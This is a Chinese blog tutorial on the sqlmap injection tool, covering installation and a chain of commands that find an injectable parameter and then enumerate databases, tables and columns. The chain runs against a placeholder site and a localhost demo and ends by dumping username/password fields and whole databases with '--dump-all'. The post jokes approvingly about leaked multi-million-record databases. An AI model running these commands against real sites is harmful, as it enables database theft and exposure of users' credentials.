『安全工具』注入神器SQLMAP

简介: 原文:『安全工具』注入神器SQLMAP          Pic by Baidu 0x 00 前言     正是SQLMAP这种神器的存在,SQL注入简直Easy到根本停不下来....     PS:国内类似软件也有阿D,明小子,挖掘机,当你用过他们之后你才会发现SQLMap才是绝对的注...
原文: 『安全工具』注入神器SQLMAP

     

    Pic by Baidu

0x 00 前言

    正是SQLMAP这种神器的存在,SQL注入简直Easy到根本停不下来....

    PS:国内类似软件也有阿D,明小子,挖掘机,当你用过他们之后你才会发现SQLMap才是绝对的注入神器

 

0x 01 注入原理

*****************************************开始分割线*****************************************

    时间原因,这段内容就先不写了

    就是因为太重要了所以要整理好在写上哈

    虽然事实上是我现在还没搞太明白我会乱说 :)

 *****************************************结束分割线*****************************************

0x 02 安装SQLMap

  1. 安装python  

    官网https://www.python.org/ 选择最新版本下载安装即可

    因为SQLMap使用Python写的 ,所以没有Python的环境SQLMap无法运行

  2. 安装SQLMap

    官网 http://sqlmap.org/ 选择最近版本安装即可

  3. 设置环境变量

    为了使用便利,将SQLMAP的安装目录添加到系统环境变量中

    之后在CMD中就可以直接使用SQLMap了

    不设置环境变量的话,要把CMD的当前目录切换到SQLMap安装目录才可以使用

 

0x 03 SQLMap常用命令介绍

  1. sqlmap.py -u "http://www.XXX.com/index.asp?id=1"     

    判断id参数是否存在注入:结果中包含 “id” is Vulnerable  字段表示存在注入

    存在注入,下面的步骤才可以执行成功~

  2. sqlmap.py -u "http://www.XXX.com/index.asp?id=1"  --dbs

    列举能列出的所有数据库名

  3.  sqlmap.py -u "http://www.XXX.com/index.asp?id=1" --current-db

    列出当前使用的数据库名,假设列出“sqltest”数据库  

  4.  sqlmap.py -u "http://www.XXX.com/index.asp?id=1"  --is-dba

    判断该注入点是否有管理员权限:返回true  表示是管理员

  5.  sqlmap.py -u "http://www.XXX.com/index.asp?id=1" -D "sqltest" --tables

    获取sqltest中的所有表,假设有"admin"表

  6.  sqlmap.py -u "http://www.XXX.com/index.asp?id=1" -D "sqltest" -T "admin" --columns

    列举表admin的字段(列名),假设存在"username","password"字段

  7.  sqlmap.py -u "http://www.XXX.com/index.asp?id=1" -D "sqltest" -T "admin" -C "username,password" --dump

    下载字段username,password的值,若询问是否破解md5加密,选择no即可

 

    至此,对一个简单的注入点(GET方式),现在就已经得到了我们想要的数据

    想看工具的注入过程 使用-v参数

    -level 会提高注入等级(默认0 只会判断get,post参数是否有注入点)

    若注入点是POST方式,或是注入点才Cookie,User-Agent中,可以利用-Date 参数 -Cookie参数指定

    当然用buip Suite架个代理,截取数据包,直接 -r 参数引入数据包也可以完成上述的注入情况的~

 

0x 04 注入Demo

    本次演示使用Apache+Php +Mysql 环境,其他环境的话

    使用SQLMap输入还是相同的命令,这点SQLMap做的好方便

       

    sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" --dbs 列所有数据库名

     

    sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" --current-db 列出当前数据库

    

    sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" --is-dba   判断注入点是否有管理员权限

    

    sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" -D "test" --tables  猜表名

    

    sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" -D "test" -T "test" --columns  猜字段名

    

    sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" -D "test" -T "test" -C "id,name" --dump 猜id和name的值

    

    

    网络上流传的脱裤 用的可就是下面的一句话

    sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" -D "test" --dump-all

    突然发现 强大的东西往往仅仅是一句话 ! !

    这条命令会直接把test数据库中所有的表全部下载到安装目录output文件夹中

    然后就有了  2000W  xxx 800W xxx ....................你懂得

    

目录
相关文章
|
2月前
|
SQL Java 应用服务中间件
Java项目防止SQL注入的四种方案
Java项目防止SQL注入的四种方案
45 0
|
SQL 测试技术 网络安全
[ 渗透工具篇 ] sqlmap 详解(一) sqlmap 安装详解
[ 渗透工具篇 ] sqlmap 详解(一) sqlmap 安装详解
1032 0
[ 渗透工具篇 ] sqlmap 详解(一) sqlmap 安装详解
|
1天前
|
SQL 测试技术 网络安全
Python之SQLMap:自动SQL注入和渗透测试工具示例详解
Python之SQLMap:自动SQL注入和渗透测试工具示例详解
10 0
|
1月前
|
SQL 存储 安全
CTF--Web安全--SQL注入之报错注入
CTF--Web安全--SQL注入之报错注入
|
1月前
|
SQL Web App开发 安全
CTF-Web安全--SQL注入之Union注入详解
CTF-Web安全--SQL注入之Union注入详解
|
9月前
|
SQL 安全 关系型数据库
3.8 sqlmap及其他安全工具进行漏洞综合利用
3.8 sqlmap及其他安全工具进行漏洞综合利用
|
9月前
|
关系型数据库 MySQL Shell
4.5 sqlmap注入获取webshell及系统权限研究
4.5 sqlmap注入获取webshell及系统权限研究
468 0
|
11月前
|
SQL 安全 Linux
Web安全——命令注入漏洞详解
Web安全——命令注入漏洞详解
400 0
|
12月前
|
SQL XML 安全
SQLMap注入工具
SQLMap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。
|
SQL 安全 Oracle
sqlmap基本使用详解与sql注入防御之网络安全
作者主页:https://www.couragesteak.com/
sqlmap基本使用详解与sql注入防御之网络安全